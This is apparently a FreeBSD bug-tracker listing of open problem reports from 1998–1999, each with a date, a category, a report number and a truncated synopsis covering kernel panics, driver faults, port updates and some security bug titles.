[1998/10/22] kern/8417 3.0 config(8) doesn't check that root fs o [1998/10/22] i386/8418 sh MAKEDEV all - fails to create hard lin o [1998/10/23] kern/8423 Intel PILA8461 NIC panics 2.2.7 during pr o [1998/10/24] i386/8435 boot.flp does not give shell prompt after o [1998/10/28] misc/8480 odd Korean timedef(LC_TIME) o [1998/10/31] bin/8518 freopen() in append mode followed by ftel o [1998/11/01] kern/8534 insufficient support routines for poll(2) o [1998/11/03] kern/8561 /kernel inode change time changes every r o [1998/11/03] i386/8567 Intel EtherExpress Pro/10 driver (if_ex.c o [1998/11/05] kern/8580 Hanging NFS pagein in nfs_bio.c (2.2.7, w o [1998/11/07] kern/8590 kernel incorrectly recognizing Maxtor 11. o [1998/11/07] kern/8596 panic: page fault while using ping's reco o [1998/11/08] kern/8607 maxprocsperuid setting causes sybase/linu o [1998/11/08] kern/8619 EXT2FS should be in GENERIC kernel o [1998/11/08] ports/8622 peter exmh2 has problems with some date formats s [1998/11/09] misc/8623 wollman [MFC] Time zone for Japan is strange (see o [1998/11/10] bin/8646 Implement rlogind -a option o [1998/11/11] kern/8655 Umount trouble of SCSI removable device o [1998/11/11] kern/8657 nfs client hung in nfs_bwrite/vfs_busy_pa o [1998/11/12] kern/8669 aio_write() and aio_read() do not work AT o [1998/11/14] kern/8683 sos Problems with Atapi in 3.0... o [1998/11/14] bin/8685 sending a SYST by ftp client closes conne o [1998/11/18] bin/8745 wosch adduser permit adding `root' and mail ali o [1998/11/20] kern/8773 Intel AN430TX motherboard ps/2 port not r f [1998/11/20] kern/8778 gibbs Buslogic BT948 in 2 boxes upgraded from S o [1998/11/23] kern/8824 Incorrect driver unit number in IDE BusMa o [1998/11/24] conf/8854 boot.flp does not probe atapi cdrom o [1998/11/24] i386/8855 sos can't mount CD in ATAPI drive after eject o [1998/11/25] bin/8865 syslogd hangs with serial console a [1998/11/28] kern/8875 Patch to allow DMA IDE with generic chips o [1998/11/29] conf/8903 /etc/rc can do NFS mounts before the netw o [1998/12/01] i386/8924 File transfers. Upload is 71Kbs downloa o [1998/12/02] kern/8940 system clock runs extremely slowly (and s o [1998/12/06] kern/8981 this also fixes X crashes and sio silo ov o [1998/12/09] kern/9030 DMPno2 - PCCards are not being recognised o [1998/12/10] i386/9044 #.0 pkgs require libkrb o [1998/12/16] kern/9095 swap detect error o [1998/12/19] kern/9129 Is it miss take ? So, ep deriver dose not o [1998/12/20] i386/9140 NIS "Magic cookie" in master.passwd slays o [1998/12/21] kern/9163 [patch] squid does not join a multicast g o [1998/12/27] bin/9214 kldload(8) error messages are inadequate o [1998/12/30] i386/9244 2.2.8 RELEASE Fixit floppy doesn't work.. o [1998/12/31] bin/9252 [patch] login program "login" don't set K o [1999/01/03] kern/9296 pps driver missing header file o [1999/01/03] kern/9297 pps driver doesn't clear ppbus control po o [1999/01/06] bin/9350 nvi incorrectly reads files with very lon o [1999/01/06] kern/9355 can't select() for writes on a bpf o [1999/01/07] bin/9362 "lpc start queue" doesn't work in 3.0-R & o [1999/01/07] bin/9379 pppd does not go through all interfaces l o [1999/01/08] kern/9391 if_addmulti doesn't check for retifma == o [1999/01/09] kern/9407 "make kernel" yields buggy kernel in cera o [1999/01/09] kern/9408 parameter reversed to a pci_cfgwrite in p o [1999/01/09] kern/9411 System crash on swapping to hole-files o [1999/01/09] kern/9413 profiling does not work with elf kernels o [1999/01/11] bin/9440 obrien amd can't mount filesystems with type:=uf o [1999/01/11] bin/9444 mount_mfs uses lots of swap. o [1999/01/12] bin/9464 fenner Fix for fetch ignoring FTP_PASSIVE_MODE e o [1999/01/13] kern/9478 support for running a script from kldload o [1999/01/14] kern/9487 pcm: mixer's synth and cd devices are swa o [1999/01/14] bin/9495 su doesn't look at login.cnf all the time o [1999/01/15] bin/9516 ftpd doesn't honor invalid shelll in logi o [1999/01/17] kern/9537 ep0 driver : no buffer space available o [1999/01/17] bin/9544 syntax error concerning loading vinum fro o [1999/01/17] kern/9548 UNION fs corrupts data and has undefined o [1999/01/17] kern/9550 The latest -current as of 17 January has o [1999/01/21] kern/9599 SMP hang after reseting CPU 1 o [1999/01/21] kern/9612 grog NFS mounts on dual-homed server may hang o [1999/01/22] docs/9618 hoek many typos in groff_mm(7) o [1999/01/24] ports/9665 ache cannot start apache server o [1999/01/25] kern/9673 ISO CD-ROM Problem o [1999/01/25] ports/9688 cwt The current tcl80 port has problems, does o [1999/01/28] i386/9759 Tar process hangs on buggy tapes o [1999/02/01] kern/9862 system crashes writing to msdos jaz disk o [1999/02/02] kern/9883 MGET()(and variants) return NULL with M_W o [1999/02/04] kern/9910 Heavy traffic renders FreeBSD acting as f s [1999/02/06] kern/9927 gibbs the ahc driver doesn't correctly grok swi o [1999/02/06] i386/9933 No error reported writing to write-protec o [1999/02/06] kern/9935 vmstat reprots bad AVM values o [1999/02/08] kern/9961 When loading if_ppp_mod.o system crashes, o [1999/02/08] i386/9962 Install Panics in with integer divide fau o [1999/02/08] kern/9974 Large amounts of kernel clock drift with o [1999/02/09] kern/9980 savecore fails with large (2gig+) swap pa o [1999/02/09] bin/9982 inet_addr(3) should be return 32bit uint. o [1999/02/10] misc/10009 jdp dlopen will crash when opening some strip o [1999/02/11] kern/10021 MOUNTING A EXT2FS A AFTER MOUNTING AN MSD o [1999/02/11] bin/10031 ypxfr does not work with Solaris master s o [1999/02/13] kern/10066 problem with a X-Window and syscons drive o [1999/02/14] i386/10089 ATAPI tape driver (wst) doesn't handle En a [1999/02/14] ports/10094 jfitz autogeneration of msql user failed o [1999/02/15] kern/10107 interlock situation with exec_map and a p o [1999/02/18] i386/10150 Compaq fxp0 Does not work on 3.0 or 3.1 b o [1999/02/18] i386/10151 ATAPI CD problem o [1999/02/19] conf/10163 init does not start when /var/msgs is a s o [1999/02/23] bin/10230 -T and -B not implemented on filehandles o [1999/02/25] misc/10259 FTP install hangs for 3.1-RELEASE o [1999/02/25] bin/10264 passwd(1) tryis NIS even with `-l' switch o [1999/02/25] kern/10265 file locking does not work with kernel pt o [1999/02/26] kern/10280 Display Adapters (PCI) probed wrong way - o [1999/02/28] misc/10302 installer o [1999/02/28] bin/10312 ken pciconf -l generates output incompatible o [1999/02/28] kern/10316 le0 goes OACTIVE after some time o [1999/03/01] bin/10341 memory leak in setenv(3) o [1999/03/02] bin/10353 ypserv gets segmentation violation o [1999/03/03] kern/10381 hlfsd/NFS failure -- directory cached bet o [1999/03/05] kern/10411 top, vmstat, iostat show 0% cpu idle & us o [1999/03/06] misc/10418 libpam is built before libradius/libtacpl o [1999/03/07] kern/10466 resume causes crashes if BIOS extmem != R o [1999/03/08] kern/10492 broadcast IP address can be set on interf o [1999/03/09] bin/10510 Remote cvs botches commits on occassion o [1999/03/09] bin/10511 incorrect return value in kvm_read(3) and o [1999/03/11] bin/10553 syslogd suddenly stopped logging o [1999/03/14] kern/10581 Kernel panic while using find on an ext2 o [1999/03/14] kern/10594 EXT2FS mount problems o [1999/03/14] bin/10596 I can't find out where someone is logged o [1999/03/15] misc/10599 [PATCH included]malloc/free breaks in cer o [1999/03/15] kern/10603 dcs Random system panics o [1999/03/15] kern/10607 Fast forwarding breaks when arp cache exp o [1999/03/16] bin/10615 make installworld DESTDIR=/some/dir o [1999/03/16] i386/10626 RTC BIOS diagnostic error on install o [1999/03/16] bin/10633 obrien [patch] tcpslice timezone problem and upd o [1999/03/17] i386/10646 Bridge code missing from ed0 driver in 3. o [1999/03/19] kern/10671 setlogin(2) return EINVAL for length of n o [1999/03/20] kern/10698 de driver doesn't work with some tulip bo o [1999/03/23] kern/10747 [PATCH] ipfirewall `deny' rules act as `r o [1999/03/24] bin/10774 sio0 doesn't work well, i belive the prob o [1999/03/24] kern/10778 "ipforward_rt" is not cleared when routin o [1999/03/25] bin/10784 `make aout-to-elf-build' died in /usr/src o [1999/03/25] bin/10785 make aout-to-elf-install died in info tar o [1999/03/25] kern/10789 Second config of kernel doesn't overwrite o [1999/03/26] bin/10807 host(1) is broken - multiple options in o o [1999/03/27] bin/10821 des getpwent() fails on NIS clients after dro o [1999/03/29] i386/10862 dcs wd.c STILL cannot recognize correct disk o [1999/03/30] kern/10870 eivind Kernel panic when writing to write-protec o [1999/03/30] misc/10879 Cannot build aout binaries under 3.1-RELE o [1999/03/30] bin/10880 Profiler libraries missing o [1999/04/01] bin/10912 /bin/sh: Fix to prevent infinite loops on o [1999/04/03] i386/10928 su reboots the system after one day uptim o [1999/04/03] i386/10935 PCI cards detected twice o [1999/04/04] ports/10946 se kdm 1.1 does not work correctly - XBINDIR o [1999/04/05] bin/10963 brian date -v dosen't quite work o [1999/04/05] i386/10969 kernel fails to compile with ccs0 o [1999/04/06] i386/10983 lnc NIC driver doesn't work o [1999/04/06] bin/10991 lpd hangs system if printer not ready on o [1999/04/07] kern/11004 Quota Issues on SMP o [1999/04/07] bin/11005 `umount -f' does not work if the NFS-serv o [1999/04/08] misc/11024 getpwnam(3) uses incorrect #define to lim o [1999/04/10] ports/11059 ache ports/security/pgp does not extract o [1999/04/11] kern/11080 fatal trap 18 while trying to mount inval o [1999/04/11] kern/11084 3.1-R kernel trap 12 with interrupts o [1999/04/13] kern/11115 Sockets die in LAST_ACK and FIN_WAIT_1 st o [1999/04/13] bin/11119 NFS quotas fail to report if alternate fi o [1999/04/14] bin/11137 /bin/ps output loses the values for all p o [1999/04/16] kern/11164 The ie network driver panics during the i o [1999/04/16] bin/11169 warning: pointer to wrong page in cron(8) o [1999/04/18] kern/11199 3.1-RELEASE kernel page fault (trap 12) u o [1999/04/18] i386/11200 AMD PCnet lnc0/lnc1 problem o [1999/04/18] kern/11208 Complete system hang/freeze. No PANIC me o [1999/04/20] bin/11247 fetch doesn't notice FTP error after RETR o [1999/04/21] kern/11255 Fore System ATM Card not working o [1999/04/21] kern/11266 frequent crashes with "Page fault, fatal o [1999/04/22] bin/11283 fetch http-timeout/timestamp bug o [1999/04/23] i386/11291 anic: ffs_alloccg: map corrupted o [1999/04/23] bin/11296 fetch(1) fails to resolve names in http m o [1999/04/26] conf/11336 Broken data sent to printer through devic o [1999/04/28] kern/11366 Filesystem can cause hang/crash in certai o [1999/04/28] conf/11376 NFS mount may be happening too soon in /e o [1999/04/29] bin/11382 generated code using rpcgen with -b optio o [1999/04/29] kern/11385 PCNet/PCI Ethernet adapter works in 3.1-R o [1999/04/29] i386/11395 ghostscript5.50 does not print properly, o [1999/04/30] kern/11405 pwd_mkdb with no tmp space leads to kerne o [1999/05/02] i386/11454 mkdir() and chdir() doesn't check argumen o [1999/05/03] kern/11462 CS network interface driver (for CS89XX b o [1999/05/03] bin/11464 obrien union copies likely broken for alpha egcs o [1999/05/04] kern/11490 yokota VESA+VM86+Splash == unstable system o [1999/05/05] kern/11507 msmith CS89XX (i386/isa/if_cs.c) fails to proper o [1999/05/05] kern/11513 cannot mount CD-ROM: Device not configure o [1999/05/05] misc/11523 3.1-STABLE BRIDGE option does not work o [1999/05/05] misc/11525 [PATCH] Networking patches to increase # o [1999/05/07] gnu/11562 tar verification doesn't work o [1999/05/07] kern/11563 pci_unmap_int doesn't do anything o [1999/05/10] ports/11636 jfitz p5-Mail-Folder missing dependencies o [1999/05/12] i386/11664 lnc1 NIC fail to work o [1999/05/12] bin/11666 ypserv fails to reply host name resolutio o [1999/05/12] kern/11679 httpd and perl5 processes stuck in "nocha o [1999/05/13] kern/11686 APM: Always "Resume failure" from suspend o [1999/05/13] kern/11692 3.1-stable deadlock o [1999/05/13] kern/11697 dg Disk failure hangs system o [1999/05/14] i386/11720 FreeBSD 2.2.8 can't load fixit disk o [1999/05/18] kern/11766 Can not traceroute through ipnat. o [1999/05/18] i386/11773 yokota mouse works at setup time. Under X it go o [1999/05/19] misc/11778 mpz_get_str() in libgmp leads up to cored o [1999/05/19] misc/11790 boot manager bug o [1999/05/20] misc/11800 gibbs Problem with scsi AHA2940 and sony SDT-20 o [1999/05/20] i386/11801 Remounting CD on IDE CDROM after eject fa o [1999/05/20] kern/11808 read/write mounted write-protected floppi o [1999/05/21] kern/11821 /dev/fd0a hangs on large files, including o [1999/05/22] docs/11852 jkh 3.X install requires 12MB of RAM, not 8 o [1999/05/23] kern/11867 Sound driver loses interrupts, no sound o [1999/05/28] kern/11911 3.1-R : writing file larger than floppy s o [1999/05/28] kern/11915 access system call says file is readable o [1999/05/28] kern/11919 kldload doesn't return error on loading a o [1999/05/28] kern/11922 missing reentrant interfaces for getpwnam o [1999/05/29] kern/11928 kldload loads kernel modules even if ther o [1999/05/29] kern/11936 wine don't work (SMP) (-STABLE) o [1999/05/29] kern/11937 vm problems after havy memory usage o [1999/05/31] kern/11969 VM_fault with mmap'd CDROM data. o [1999/06/02] i386/11991 fdisk does not assign slices to unused pa o [1999/06/02] bin/11992 /usr/src/sbin/mountd/mountd.c has '#ifdef o [1999/06/04] kern/12022 System clock timewarps o [1999/06/06] bin/12054 explicit -ltermcap after -lncurses causes o [1999/06/06] kern/12062 sa tape driver with Cipher 60M SCSI QIC t o [1999/06/08] bin/12091 syslog packets from a remote machine are o [1999/06/08] kern/12092 vpo driver not working in 3.2-RELEASE o [1999/06/09] kern/12104 Certain cdcontrol commands don't work pro o [1999/06/10] bin/12120 named crashes. o [1999/06/10] gnu/12122 cc hangs on STDIN with -pipe and .s files o [1999/06/11] bin/12137 something wrong with shell -- functions w o [1999/06/12] ports/12174 ache bash terminate with corefile if pid > 320 o [1999/06/12] gnu/12175 gdb crashes with pids > 32736 o [1999/06/13] bin/12191 wcol is trying to allocate a shared memor o [1999/06/15] misc/12221 djpeg halt's freebsd box o [1999/06/16] bin/12242 segmentation fault running /usr/bin/fmt o [1999/06/16] kern/12247 userlevel program let kernel hang o [1999/06/17] kern/12262 pcm sound driver with SB16pnp does not ap o [1999/06/18] bin/12272 The ctype locales print an error message o [1999/06/18] kern/12274 cd mount problem o [1999/06/20] kern/12305 clock() ticks backwards o [1999/06/21] kern/12320 error 6: panic: cannot mount root (2) o [1999/06/22] bin/12349 des 3.2-R inetd doesn't re-read ALL configura s [1999/06/24] kern/12381 bde Bad scheduling in FreeBSD o [1999/06/25] conf/12387 CDROM boot failure on Thinpad 770X, 380ED o [1999/06/25] kern/12394 3.2-RELEASE, rl0 ethernet interface freez o [1999/06/28] kern/12434 signal 11 (core dumped) on mysqld when ma o [1999/06/30] kern/12464 bad reference in struct vm_zone o [1999/07/01] kern/12484 [PATCH] bpf_filter() broken o [1999/07/06] i386/12529 Linksys ether16 NE2000 compat. won't conf o [1999/07/06] bin/12538 getpwuid() NIS UID override fails o [1999/07/07] kern/12551 mks ASIC output is shifted following a short o [1999/07/07] docs/12557 nik There are no man pages for the widely use a [1999/07/08] bin/12564 jkh Sysinstall can not use live filesystem fr o [1999/07/09] misc/12577 Can't link code using catopen o [1999/07/09] ports/12584 stb directories made during 'make install' ar o [1999/07/13] kern/12632 Panic (trap 18) with Symbios SCSI control o [1999/07/14] ports/12637 ports patch to help multi-byte support in windo o [1999/07/14] misc/12640 Can use 2nd CD-ROM for fixit mode. o [1999/07/15] kern/12646 IGMP reports not sent if no multicast rou o [1999/07/16] gnu/12662 tar verification doesn't work in 3.2-RELE o [1999/07/18] kern/12703 tx0 truncates skip packets o [1999/07/20] bin/12727 billf Game patches from NetBSD o [1999/07/21] conf/12745 diffs to delay start of amd rwhod timed o o [1999/07/21] ports/12746 ache problem with bash-2.03(1) port (/usr/port o [1999/07/21] i386/12749 marcel Bug in link() and all other filename func o [1999/07/22] kern/12758 Adjusting the idle priority of a process o [1999/07/23] i386/12771 lpt hangs and never works again, even aft o [1999/07/24] kern/12800 buffer leak in cluster_wbuild o [1999/07/26] alpha/12821 alpha slib.aq for the 3.2-RELEASE alpha distrib o [1999/07/27] kern/12831 sos CD-rom cannot be mounted o [1999/07/27] conf/12832 config -g creates broken Makefile in 3.2- o [1999/07/27] kern/12838 PC-Card ctlr(0) Vadem 365 support seems b o [1999/07/28] misc/12856 installworld over nfs broken (3.2S) o [1999/07/29] kern/12869 panic: softdep_flushfiles: looping o [1999/07/30] kern/12884 Hot to panic FreeBSD-3.2-Release o [1999/07/31] ports/12905 jmz Graphical setup utility won't always inst o [1999/08/02] kern/12927 [PATCH] using BROKEN_KEYBOARD_RESET optio o [1999/08/02] ports/12930 asami libtool create defuct makefiles if PREFIX o [1999/08/03] misc/12938 gethostbyaddr(209.201.116.19) - Bus error o [1999/08/04] kern/12979 Response time continually slows on idle m o [1999/08/05] kern/12991 system queue is cleared when a port or pi o [1999/08/06] kern/12996 ifconf in sys/net/if.c returns larger buf o [1999/08/07] conf/13013 Selecting CDROM as install media doesn't o [1999/08/08] kern/13022 ipfilter is out-of-date o [1999/08/08] misc/13027 sysinstall has no /dev entry for wfd0s4 ( o [1999/08/10] i386/13058 Installation hangs after commit f [1999/08/13] kern/13113 panic related (proberbly) to vnode o [1999/08/14] kern/13141 se Multiple LUN support in NCR driver is bro o [1999/08/14] ports/13145 se kaudioserver runs amok on logout o [1999/08/15] kern/13150 panic: ufs_dirbad: bad dir o [1999/08/15] ports/13170 ports New port: UW-Imap with maildir and qmail o [1999/08/15] gnu/13172 Bug in workaround of russian locale & sor o [1999/08/16] kern/13180 panic: ffs_alloccg: map corrupted o [1999/08/17] kern/13196 [BTX] page in BTX has problem(quit key) o [1999/08/17] kern/13198 panic: vm_fault: fault on nofault entry o [1999/08/17] gnu/13200 The assembler chokes on very long operand o [1999/08/18] kern/13234 .../netinet/ip_input.c should include opt o [1999/08/21] bin/13286 jhay [SECURITY] Potential IPXrouted(8) /tmp se o [1999/08/24] bin/13350 make clean in bsd.obj.mk no longer proper o [1999/08/24] ports/13370 ache elm-port upgraded, improved o [1999/08/25] misc/13378 Tecra 8000 hangs in UserConfig, cannot co o [1999/08/25] kern/13382 Only 1 parallel port supported if pps ena o [1999/08/25] bin/13383 sys/netinet/in.h violates C++ spec. o [1999/08/26] kern/13405 syslogd get system hang o [1999/08/27] gnu/13427 gdb reports wrong info o [1999/08/28] gnu/13438 objc forward core dump using system cc o [1999/08/29] i386/13452 changing to root device wd0s1a \n error 2 o [1999/08/29] bin/13463 /bin/sh does not handle interrupts correc o [1999/08/30] misc/13470 Old problem re-introduced: TCP sucket buf o [1999/08/31] bin/13504 troubles with the ipfw tool o [1999/09/01] kern/13517 hang system o [1999/09/05] kern/13587 Voxware MIXER_READ ioctl corrupts memory o [1999/09/06] kern/13593 Problems with FIFO and select o [1999/09/07] kern/13612 gibbs "Timedout SCB handled by another timeout" o [1999/09/07] kern/13630 system halts after npx0 detected on 3.2 i o [1999/09/07] kern/13632 Floppy hangs system o [1999/09/08] kern/13644 select(2) timer inaccurate, especially wi o [1999/09/08] kern/13646 Kernel Trap error when booting 3.3-RC ker o [1999/09/09] i386/13655 sysmouse, signal 10 and XF86_S3 o [1999/09/09] ports/13656 obrien update ports: dlint 1.3.3 o [1999/09/10] kern/13678 sos hard lockup's on tsleep in atapi_queue_cm o [1999/09/10] bin/13679 ncurses-based programs eat 100% CPU after o [1999/09/10] bin/13691 tcpslice cannot extract over 2GB part of o [1999/09/11] bin/13703 MCNP compilation problem o [1999/09/12] bin/13711 root fs not properly unmounted after shut o [1999/09/12] ports/13714 stb netatalk-1.4b2+asun2.1.3 fails chmod g+s o [1999/09/13] conf/13724 Prevent ".: Out of file descriptors" erro o [1999/09/13] gnu/13729 strip(1) exits with an error on script fi o [1999/09/13] kern/13736 enabling NAT on 3.3RC results in panic sb o [1999/09/13] kern/13740 wrong IP statistics o [1999/09/15] kern/13757 wpaul tl0: adapter check: 180005 mesages keep c o [1999/09/15] i386/13765 memory problem: compilation of emacs dies o [1999/09/15] bin/13766 ldconfig doesn't recognize symbolic links o [1999/09/15] bin/13768 sh MAKEDEV cdN creates all cd(N-1)-device o [1999/09/15] misc/13771 brian Packet fragment filter bug in user-land P o [1999/09/16] conf/13775 multi-user boot may hang in NIS environme o [1999/09/16] ports/13776 jmz The XFree86-3.3.5 port -- one of the kerb o [1999/09/16] conf/13785 boot block/manager problem at installatio o [1999/09/17] i386/13787 lnc driver isn't really the lnc driver o [1999/09/18] kern/13810 3.3 panic rlist_free: free start overlaps o [1999/09/18] i386/13811 ide cdrom stops recognizing audio cdroms o [1999/09/19] bin/13818 `ipfw' doesn't grok "log" keyword o [1999/09/19] misc/13837 peter src/contrib/bind is outdated. o [1999/09/19] ports/13839 se kdegraphics11 'make PREFIX' fix, one comp o [1999/09/19] i386/13847 missing support for INT 0x13 extensions i o [1999/09/20] i386/13857 Problem with switching between processes o [1999/09/22] conf/13900 jkh [PATCH] sysinstall can get SIGPIPE if a d o [1999/09/22] alpha/13912 alpha unaligned access Problem seems to be aff o [1999/09/23] misc/13920 pppd acts differently on 3.3-RELEASE ("mi o [1999/09/24] kern/13941 ncr0: SCSI phase error on GENERIC kernel o [1999/09/26] misc/13978 peter a write to last column bug appears since o [1999/09/26] bin/13980 Parameter expansion pattern removal bug i o [1999/09/27] kern/13997 phk RLIMIT_NPROC works unadequately for jails o [1999/09/28] kern/14026 Many network connections get left in the o [1999/09/28] i386/14027 "disklabel -r -w" on new disk reports "No o [1999/09/28] kern/14033 Data acq process gets stuck in vmopar o [1999/09/30] kern/14060 3.3-STABLE on primary mail server panics o [1999/09/30] bin/14069 Buffer overflow in mail(1) o [1999/09/30] kern/14072 Rebooting in FreeBSD 3.3 wipes out known o [1999/10/01] conf/14075 CDROM not being recognized during certain o [1999/10/02] kern/14096 parallel port -- ppi -- driver broken aft o [1999/10/03] bin/14102 make world -DWANT_AOUT fails in lib/compa o [1999/10/04] misc/14121 resurfaced bug in rmt preventing remote d o [1999/10/04] kern/14123 lnc driver is not working o [1999/10/04] ports/14128 torstenb Wrong group and mode on postdrop program o [1999/10/04] i386/14135 lpt1 nolonger exists after 3.2-RELEASE o [1999/10/05] kern/14144 bad conversions in kern_fork() o [1999/10/05] ports/14153 obrien xwpe has no distribution tar file o [1999/10/07] misc/14178 FreeBSD 3.2 - Calls from CGI scripts, cro o [1999/10/07] kern/14183 grog bridge forwarding corrupted broadcast IP o [1999/10/07] ports/14186 se kdebase11 package not compiled correctly o [1999/10/10] bin/14250 restore(8) can loop if tty goes away or w o [1999/10/10] misc/14254 [Fwd: clock(3) runs backwards! (fwd)] (fw o [1999/10/10] kern/14257 error 6: panic: cannot mount root (2) - d o [1999/10/11] misc/14264 Combination of aio_read(), pthread_cond_w o [1999/10/12] i386/14282 Using FreeBSD 3.* ThinkPad 600E doesn't r o [1999/10/12] ports/14283 ache apache13 htpasswd dumps core o [1999/10/12] kern/14285 dillon NFS client appears to lose data o [1999/10/14] i386/14324 wst OR atapi drivers won't work o [1999/10/14] misc/14326 kerberos4 pam-related breakage in current o [1999/10/14] misc/14327 names used in netdb.h may conflict with n o [1999/10/14] i386/14334 imp AHA-1542A not supported by FreeBSD 3.x (" o [1999/10/15] kern/14354 grog vinum cannot compile for alpha o [1999/10/19] ports/14423 obrien Build of lsof fails since 'struct namecac o [1999/10/20] misc/14431 Network Interface Problem o [1999/10/20] ports/14434 ache update ports: ftp/wu-ftpd to 2.6.0 o [1999/10/20] bin/14444 enigma command can't decrypt files encryp o [1999/10/21] i386/14446 Doesn't boot on Mobile Celeron o [1999/10/22] kern/14457 SIOCGIFCONF uses too much memory o [1999/10/25] ports/14524 markm PERL 5.005_03 Config.PM on 3.2-STABLE say o [1999/10/25] kern/14536 kernel panic on 64KB block size ufs files o [1999/10/26] kern/14546 SB128PCI work incorrect play wav-files un o [1999/10/26] ports/14548 peter rdist6 has /usr/lib/sendmail compiled int o [1999/10/26] kern/14549 3C509 broken in 3.3 o [1999/10/27] kern/14566 Non-kernel programs have little/no contro o [1999/10/30] ports/14615 taoka [PATCH] Emacs scrambles the screen on the f [1999/10/31] ports/14625 green pidentd doesn't work correctly for finger o [1999/10/31] bin/14626 sendmail 8.9.3 bug with aliases in -CURRE o [1999/11/03] kern/14685 setjmp/longjmp in threaded app cause subs o [1999/11/03] i386/14689 waitpid doesn't harvest child process whe o [1999/11/03] ports/14696 ports New port: wmGrabImage o [1999/11/04] kern/14712 root has access to NFS mounted directorie o [1999/11/05] kern/14722 TCP connections hangs in FIN_WAIT_2 for > o [1999/11/05] bin/14729 when sysinstall is running as init it sho o [1999/11/07] kern/14765 Something wrong for UDMA for Gigabyte 586 o [1999/11/07] bin/14782 ypbind can not bind to Solaris NIS master o [1999/11/08] kern/14787 /dev/lpt0 doesn't work unless/until you d f [1999/11/09] kern/14797 Serious locking problem in CURRENT o [1999/11/09] i386/14799 Promise Ultra33 doesn't work o [1999/11/09] i386/14806 if_tun.ko conflicts with built-in tunnel o [1999/11/10] misc/14811 getpwent is not enumerating all entries i o [1999/11/10] kern/14812 de0 driver malfunctions in full-duplex o [1999/11/10] kern/14814 4.0-CURRENT SMP mode causes ep0 slow o [1999/11/11] ports/14826 obrien security/fwtk smapd calls sendmail with w o [1999/11/12] bin/14844 rwhod is remotely crashable o [1999/11/12] kern/14848 Frame Relay support, corrected o [1999/11/12] kern/14849 newpcm doesn't work with Vibra16X a [1999/11/12] misc/14856 billf ftp stalls on FreeBSD 3.3 (CDROM) tested o [1999/11/14] ports/14883 dbaker ports/misc/rc5des build fails o [1999/11/14] ports/14888 ports ports/security/bjorb build fails o [1999/11/14] kern/14890 ffs_valloc: dup alloc o [1999/11/15] misc/14895 portmap bug (when run with -v flag) o [1999/11/15] kern/14900 3.3-RELEASE panic in pmap_pte_quick() o [1999/11/15] i386/14907 ipfw show take wrong values of counter/or o [1999/11/15] conf/14913 Fix for "arplookup 127.0.0.1 failed: coul o [1999/11/16] kern/14917 grog DMA doesn't works with ALI ALADDIN M1543/ o [1999/11/16] kern/14918 Write access to write protected media cau o [1999/11/16] bin/14920 install(1) hangs when intalling files sam o [1999/11/16] ports/14926 ports JBIG-KIT port upgraded to the version 1.1 o [1999/11/16] misc/14932 "more" eating up CPU on users with shell= o [1999/11/16] i386/14937 ipfw -a list show wrong information o [1999/11/17] ports/14944 ports No stable Gimp in ports o [1999/11/17] i386/14946 rmt - remote magtape protocol o [1999/11/17] ports/14955 jmz XFree86-port does not support ru_SU.* loc o [1999/11/17] kern/14960 Compaq EISA array controller not working o [1999/11/17] kern/14962 PnP doesn't detect AWE64 when PnP modem i o [1999/11/17] misc/14964 Network Interface Configuration Problem a o [1999/11/18] bin/14975 lpc start subcmd doesn't start printing o [1999/11/18] bin/14978 lprm(1) does not kill active daemon if ho o [1999/11/18] ports/14987 ports graphics/xpm does not build a dynamic lib o [1999/11/19] kern/14997 NFSv3 open O_EXCL fails to set proper "at o [1999/11/19] misc/15001 'fetch' doesn't work for http when behind o [1999/11/19] i386/15003 3C574 (ep0) reads bogus ethernet address o [1999/11/21] i386/15018 Printingproblem o [1999/11/22] bin/15046 /sbin/dhclient-script ignores resolv.conf o [1999/11/22] ports/15050 ports Re: Tcl Data transformations (Tcl-Trf) po o [1999/11/22] ports/15060 ports Update port: misc/fortuneit o [1999/11/23] i386/15062 i4b stops working after some time o [1999/11/23] bin/15070 vfprintf/cvt/__dtoa race condition in thr o [1999/11/24] i386/15074 Two different panics when running Linux b o [1999/11/24] kern/15075 Intel Etherexpress Pro timeouts when >1 c o [1999/11/24] misc/15080 corrupt tree/subtree on primary ftp serve o [1999/11/24] ports/15085 jedgar fixing-upgrading the editors/xenon port o [1999/11/24] kern/15086 Borked sscape drivers :) o [1999/11/25] kern/15087 3.3-STABLE panic while starting daemons ( o [1999/11/25] kern/15089 mmap of files from 2K-block device failed o [1999/11/26] ports/15100 ports new port links-0.80 s [1999/11/26] bin/15101 joe [PATCH] cdcontrol does not perform bounds f [1999/11/26] ports/15107 green Patch for FreeBSD s/key support in OpenSS o [1999/11/26] misc/15109 problem printing graphic pages o [1999/11/27] ports/15120 ports [PATCH] mail/pine4 pgp support does not h o [1999/11/27] ports/15123 rse www/apache13-modssl has PREFIX problems f o [1999/11/28] kern/15136 Panic on MSDOS FS mount o [1999/11/28] ports/15137 ports [PATCH] www/lynx-ssl can't find OpenSSL i o [1999/11/28] conf/15150 Taking encoding scheme latin1 into accoun o [1999/11/28] ports/15157 se [PATCH] Environment Botch in KDM o [1999/11/30] misc/15190 crashing while in a multiplatform environ o [1999/11/30] kern/15193 PCCARD ethernet interface not returned by o [1999/12/01] kern/15204 systems panics when ktrace-ing o [1999/12/01] kern/15206 Ethernet driver if_vr.c (VIA Technologies o [1999/12/01] ports/15212 ports new port: irc/bitchx-1.0 o [1999/12/02] misc/15228 C++ exceptions+threads SIGABRTs. o [1999/12/02] kern/15235 dillon Race conditions in pipe_write causes kern o [1999/12/05] misc/15269 error server timeout downloading small fi o [1999/12/05] ports/15287 billf Fix for linux-netscape not requiring X ao o [1999/12/06] ports/15305 ports can't install netpbm-8.0 o [1999/12/06] i386/15327 Unable to use ISA sound card with AD1816A o [1999/12/07] ports/15332 ports port of ftplocate-1.50 o [1999/12/07] kern/15345 lkm no longer works after 3.3 o [1999/12/07] ports/15348 ports [update] japanese/tcl80 o [1999/12/07] ports/15349 ports [update] japanese/tk80 o [1999/12/08] kern/15357 newton make depend fails due to missing opt_svr4 o [1999/12/08] i386/15364 Flash Player 4 for Linux has no sound wit o [1999/12/08] kern/15365 Fatal trap 18 (integer divide fault) when o [1999/12/09] ports/15368 torstenb Update ftp/mirror o [1999/12/10] ports/15395 ports fix port: net/mrtg (BUILD/LIB_DEPEND prob o [1999/12/10] ports/15403 mharo unbreak port with update: sudo -> 1.6.1 o [1999/12/10] ports/15404 ports www/p5-CGI: Wrong BUILD_DEPENDS? o [1999/12/11] bin/15414 syslogd -ss disables all network logging o [1999/12/11] kern/15420 3.3-RELEASE Kernel freeze o [1999/12/11] ports/15426 ports build of devel/t1lib hangs in configure o [1999/12/12] ports/15437 ports update graphics/gd port to support ttf 